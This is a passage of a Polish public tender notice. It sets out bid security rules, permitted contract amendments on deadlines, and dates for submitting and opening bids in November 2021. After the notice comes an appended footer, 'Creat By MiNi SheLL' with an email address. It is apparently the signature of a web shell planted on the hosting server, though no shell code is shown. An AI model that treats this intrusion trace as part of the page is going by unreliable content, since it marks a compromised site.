zamawiającego).<br/>6) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w<br/>postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym<br/>przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego),<br/>gwaranta/poręczyciela oraz wskazanie ich siedzib.<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na<br/>pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy<br/>Pzp.<br/>7) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie<br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o<br/>zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający<br/>odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się zmiany umowy w zakresie i na warunkach wskazanych w obowiązujących<br/>przepisach prawa, ze szczególnym uwzględnieniem zapisów niniejszego paragrafu. <br/>2. Zmiana harmonogramu rzeczowego oraz terminu wykonania umowy możliwa jest na wniosek<br/>Wykonawcy lub Zamawiającego w następujących przypadkach:<br/>1) opóźnienia związanego z przekazaniem terenu budowy lub dokonaniem odbioru końcowego<br/>robót spowodowanego przez Zamawiającego, nie dłużej jednak niż o czas trwania tego<br/>opóźnienia,<br/>2) jakichkolwiek opóźnień, utrudnień lub przeszkód spowodowanych przez osoby <br/>i podmioty trzecie, jeżeli te opóźnienia nie są wynikiem działania lub zaniechania Wykonawcy, o<br/>czas trwania tych opóźnień, utrudnień lub przeszkód,<br/>3) jeżeli wystąpiła konieczność przeprowadzenia robót zamiennych, wpływających na<br/>dotrzymanie pierwotnego terminu realizacji umowy, szczególnie w następstwie okoliczności,<br/>których w normalnych warunkach Zamawiający nie mógł przewidzieć, <br/>o czas trwania robót zamiennych,<br/>4) w przypadku wstrzymania robót przez Zamawiającego, dopuszcza się zmianę terminu<br/>realizacji przedmiotu umowy o okres, na jaki roboty zostały wstrzymane,<br/>5) wystąpienia siły wyższej, uniemożliwiającej wykonanie przedmiotu umowy zgodnie <br/>z terminem określonym w umowie - dopuszcza się zmianę terminu końcowego realizacji, nie<br/>dłużej jednak niż o czas trwania tych okoliczności, <br/>6) zmiany przepisów prawa powszechnie obowiązującego w zakresie w jakim mogą one wpłynąć<br/>na terminowość realizacji umowy,<br/>7) w przypadku pojawienia się wynikających ze specyfiki działalności Zamawiającego potrzeb w<br/>zakresie zmiany terminów wykonania lub odbioru przedmiotu umowy, w tym spowodowana<br/>podjęciem przez Zamawiającego decyzji o przeprowadzeniu przez osobę trzecią kontroli jakości<br/>i sposobu prowadzenia prac dopuszcza się zmianę terminu realizacji przedmiotu umowy, nie<br/>dłużej jednak niż o czas trwania tych okoliczności,<br/>8) zmiany w strukturze i organizacji Zamawiającego, które mają wpływ na zakres lub czas<br/>trwania umowy, w zakresie, w jakim zmiany te wpłynęły na zakres lub termin realizacji umowy,<br/>9) w przypadku opóźnienia w innych projektach Zamawiającego, uniemożliwiającego realizację<br/>umowy zgodnie z określonym pierwotnie terminem lub powodującego, że realizowanie umowy<br/>zgodnie z określonym terminem jest nieracjonalne technicznie, organizacyjnie lub finansowo,<br/>dopuszcza się zmianę terminu realizacji przedmiotu umowy, po dokonaniu uprzedniej oceny<br/>tych okoliczności przez Zamawiającego,<br/>10) w przypadku następstw działania organów administracji, w szczególności przekroczenia<br/>zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń<br/>czy aprobat, dopuszcza się zmianę terminu realizacji przedmiotu umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-19 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-19 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com